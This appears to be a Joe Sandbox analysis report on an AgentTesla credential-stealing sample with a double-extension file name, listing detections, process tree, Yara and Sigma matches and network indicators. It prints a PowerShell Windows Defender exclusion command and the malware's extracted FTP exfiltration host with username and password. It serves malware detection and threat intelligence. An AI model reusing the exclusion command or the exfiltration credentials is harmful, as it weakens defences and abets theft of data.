Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
CHARIKLIA JUNIOR DETAILS.pdf.scr.exe

Overview

General Information

Sample name:CHARIKLIA JUNIOR DETAILS.pdf.scr.exe
Analysis ID:1560091
MD5:56507d8fc1346411ed4fdbecb4589ec8
SHA1:a7d542484247819e9037cbd913b8ad1b68b0dad6
SHA256:ad3517d5640b93e40bc1e839f6616222801d06dd83ed5887462a71f3858f5b40
Tags:exeuser-threatcat_ch
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • CHARIKLIA JUNIOR DETAILS.pdf.scr.exe (PID: 7492 cmdline: "C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe" MD5: 56507D8FC1346411ED4FDBECB4589EC8)
    • powershell.exe (PID: 7668 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "Host": "ftp://beirutrest.com", "Username": "belogs@beirutrest.com", "Password": "9yXQ39wz(uL+"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.3862005678.000000000327C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000005.00000002.3857823640.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000005.00000002.3857823640.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000005.00000002.3862005678.0000000003251000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000005.00000002.3862005678.0000000003251000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 7 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            5.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              5.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                5.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                • 0x330d3:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                • 0x33145:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                • 0x331cf:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                • 0x33261:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                • 0x332cb:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                • 0x3333d:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                • 0x333d3:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                • 0x33463:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                5.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.400000.0.unpackMALWARE_Win_AgentTeslaV2AgenetTesla Type 2 Keylogger payloadditekSHen
                • 0x304c6:$s2: GetPrivateProfileString
                • 0x2fbc5:$s3: get_OSFullName
                • 0x31203:$s5: remove_Key
                • 0x31392:$s5: remove_Key
                • 0x32273:$s6: FtpWebRequest
                • 0x330b5:$s7: logins
                • 0x33627:$s7: logins
                • 0x3630a:$s7: logins
                • 0x363ea:$s7: logins
                • 0x37ce6:$s7: logins
                • 0x36f84:$s9: 1.85 (Hash, version 2, native byte-order)
                0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.3f891f0.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  Click to see the 8 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe", ParentImage: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, ParentProcessId: 7492, ParentProcessName: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe", ProcessId: 7668, ProcessName: powershell.exe
                  Sigma detected: Powershell Defender Exclusion
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe", ParentImage: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, ParentProcessId: 7492, ParentProcessName: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe", ProcessId: 7668, ProcessName: powershell.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe", ParentImage: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, ParentProcessId: 7492, ParentProcessName: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe", ProcessId: 7668, ProcessName: powershell.exe

                  Suricata Signatures

                  No Suricata rule has matched

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Found malware configuration
                  Source: 5.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://beirutrest.com", "Username": "belogs@beirutrest.com", "Password": "9yXQ39wz(uL+"}
                  Multi AV Scanner detection for submitted file
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exeReversingLabs: Detection: 55%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for sample
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exeJoe Sandbox ML: detected
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.8:49709 version: TLS 1.2
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Networking

                  barindex
                  Yara detected Generic Downloader
                  Source: Yara matchFile source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.3f891f0.0.raw.unpack, type: UNPACKEDPE
                  Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                  Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                  Source: Joe Sandbox ViewIP Address: 50.87.144.157 50.87.144.157
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: api.ipify.org
                  Source: unknownDNS query: name: api.ipify.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                  Source: global trafficDNS traffic detected: DNS query: beirutrest.com
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000005.00000002.3862005678.000000000327C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://beirutrest.com
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000000.00000002.1423822508.0000000002DCA000.00000004.00000800.00020000.00000000.sdmp, CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000005.00000002.3862005678.0000000003201000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exeString found in binary or memory: http://tempuri.org/ianiDataSet.xsd
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exeString found in binary or memory: http://tempuri.org/ianiDataSet1.xsd
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exeString found in binary or memory: http://tempuri.org/ianiDataSet2.xsdM
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000000.00000002.1424716965.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000005.00000002.3857823640.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000000.00000002.1424716965.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000005.00000002.3862005678.0000000003201000.00000004.00000800.00020000.00000000.sdmp, CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000005.00000002.3857823640.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000005.00000002.3862005678.0000000003201000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000005.00000002.3862005678.0000000003201000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                  Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.8:49709 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Contains functionality to log keystrokes (.Net Source)
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.3f891f0.0.raw.unpack, n00.cs.Net Code: lGCzgIzdr

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 5.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 5.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.3f891f0.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.3f891f0.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.3f891f0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.3f891f0.0.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Initial sample is a PE file and has a suspicious name
                  Source: initial sampleStatic PE information: Filename: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeCode function: 0_2_0115D51C0_2_0115D51C
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeCode function: 0_2_0583AE790_2_0583AE79
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeCode function: 0_2_05836D510_2_05836D51
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeCode function: 0_2_05836D600_2_05836D60
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeCode function: 0_2_05834E480_2_05834E48
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeCode function: 0_2_058349FC0_2_058349FC
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeCode function: 0_2_058369180_2_05836918
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeCode function: 0_2_058369280_2_05836928
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeCode function: 0_2_058352800_2_05835280
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeCode function: 0_2_05834A100_2_05834A10
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeCode function: 5_2_02F2E5B85_2_02F2E5B8
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeCode function: 5_2_02F24A585_2_02F24A58
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeCode function: 5_2_02F2A9E05_2_02F2A9E0
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeCode function: 5_2_02F23E405_2_02F23E40
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeCode function: 5_2_02F2DD385_2_02F2DD38
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeCode function: 5_2_02F241885_2_02F24188
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeCode function: 5_2_06DE89705_2_06DE8970
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeCode function: 5_2_06DEB5F85_2_06DEB5F8
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeCode function: 5_2_06DF65F05_2_06DF65F0
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeCode function: 5_2_06DF7D805_2_06DF7D80
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeCode function: 5_2_06DF55A05_2_06DF55A0
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeCode function: 5_2_06DFB2485_2_06DFB248
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeCode function: 5_2_06DF23505_2_06DF2350
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeCode function: 5_2_06DFC1905_2_06DFC190
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeCode function: 5_2_06DF76A05_2_06DF76A0
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeCode function: 5_2_06DF5CF85_2_06DF5CF8
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeCode function: 5_2_06DFE3A85_2_06DFE3A8
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeCode function: 5_2_06DF00405_2_06DF0040
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeCode function: 5_2_06DF03515_2_06DF0351
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeCode function: 5_2_06DF00075_2_06DF0007
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000000.00000002.1427863922.0000000005460000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs CHARIKLIA JUNIOR DETAILS.pdf.scr.exe
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000000.00000002.1423822508.0000000002DCA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename2ee75d06-d489-4537-90fc-92fe0f559436.exe4 vs CHARIKLIA JUNIOR DETAILS.pdf.scr.exe
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000000.00000002.1429287807.0000000007A81000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedd vs CHARIKLIA JUNIOR DETAILS.pdf.scr.exe
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000000.00000002.1428858547.0000000007230000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs CHARIKLIA JUNIOR DETAILS.pdf.scr.exe
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000000.00000002.1412520912.0000000000EFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs CHARIKLIA JUNIOR DETAILS.pdf.scr.exe
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000000.00000002.1424716965.0000000003D79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename2ee75d06-d489-4537-90fc-92fe0f559436.exe4 vs CHARIKLIA JUNIOR DETAILS.pdf.scr.exe
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000000.00000002.1424716965.0000000003D79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs CHARIKLIA JUNIOR DETAILS.pdf.scr.exe
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000000.00000002.1423822508.0000000002DD5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs CHARIKLIA JUNIOR DETAILS.pdf.scr.exe
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000000.00000000.1398062622.0000000000910000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameQkTu.exe4 vs CHARIKLIA JUNIOR DETAILS.pdf.scr.exe
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000005.00000002.3858210909.0000000000F99000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs CHARIKLIA JUNIOR DETAILS.pdf.scr.exe
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000005.00000002.3857823640.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilename2ee75d06-d489-4537-90fc-92fe0f559436.exe4 vs CHARIKLIA JUNIOR DETAILS.pdf.scr.exe
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exeBinary or memory string: OriginalFilenameQkTu.exe4 vs CHARIKLIA JUNIOR DETAILS.pdf.scr.exe
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 5.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 5.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.3f891f0.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.3f891f0.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.3f891f0.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.3f891f0.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.3f891f0.0.raw.unpack, NpXw3kw.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.3f891f0.0.raw.unpack, NpXw3kw.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.3f891f0.0.raw.unpack, gyfrCFT5x9I.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.3f891f0.0.raw.unpack, gyfrCFT5x9I.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.3f891f0.0.raw.unpack, gyfrCFT5x9I.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.3f891f0.0.raw.unpack, gyfrCFT5x9I.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.3f891f0.0.raw.unpack, fpnV0Qjz.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.3f891f0.0.raw.unpack, fpnV0Qjz.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.7230000.2.raw.unpack, mO0cHCfe6EeD0PN2nv.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.7230000.2.raw.unpack, oTWR4jX5WAldfeNr9l.csSecurity API names: _0020.SetAccessControl
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.7230000.2.raw.unpack, oTWR4jX5WAldfeNr9l.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.7230000.2.raw.unpack, oTWR4jX5WAldfeNr9l.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/6@2/2
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.logJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7676:120:WilError_03
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vrbdbnsw.yx3.ps1Jump to behavior
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
